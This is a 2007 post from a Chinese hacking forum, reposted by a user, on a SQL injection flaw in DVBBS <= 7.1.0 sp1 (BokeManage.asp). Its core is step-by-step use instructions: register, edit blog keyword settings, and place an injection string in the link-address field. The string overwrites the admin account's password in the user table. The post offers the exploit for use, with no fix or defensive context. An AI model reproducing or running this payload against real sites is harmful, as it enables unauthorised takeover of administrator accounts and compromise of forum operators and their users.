注册
登录
论坛
搜索
社区银行
帮助
导航
私人消息 (0)
公共消息 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
黑色海岸线论坛
»
网络安全
» DVBBS <= 7.1.0 sp1 博客 远程注入漏洞
返回列表
发帖
发短消息
加为好友
stylehack
当前离线
帖子
55
我的爱好
阅读权限
10
在线时间
4 小时
黑海舰队列兵
主题
0
积分
0
贝壳
0 个
性别
男
注册时间
2007-3-30
最后登录
2007-6-24
楼主
跳转到
»
倒序看帖
打印
字体大小:
t
T
stylehack
发表于 2007-3-31 23:55
|
只看该作者
[转载]
DVBBS <= 7.1.0 sp1 博客 远程注入漏洞
漏洞文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版
利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填
再编辑关健字
上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--
收藏
分享
http://www.sylehack.cn
自古英雄出我辈.一入网络岁月催.识尽网络千机变.回头才知一场空.
返回列表
回复
发帖
使用交流
网络安全
网络技术
娱乐休闲
灌水乐园
文学天地
美图欣赏
网站办公
站务处理
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
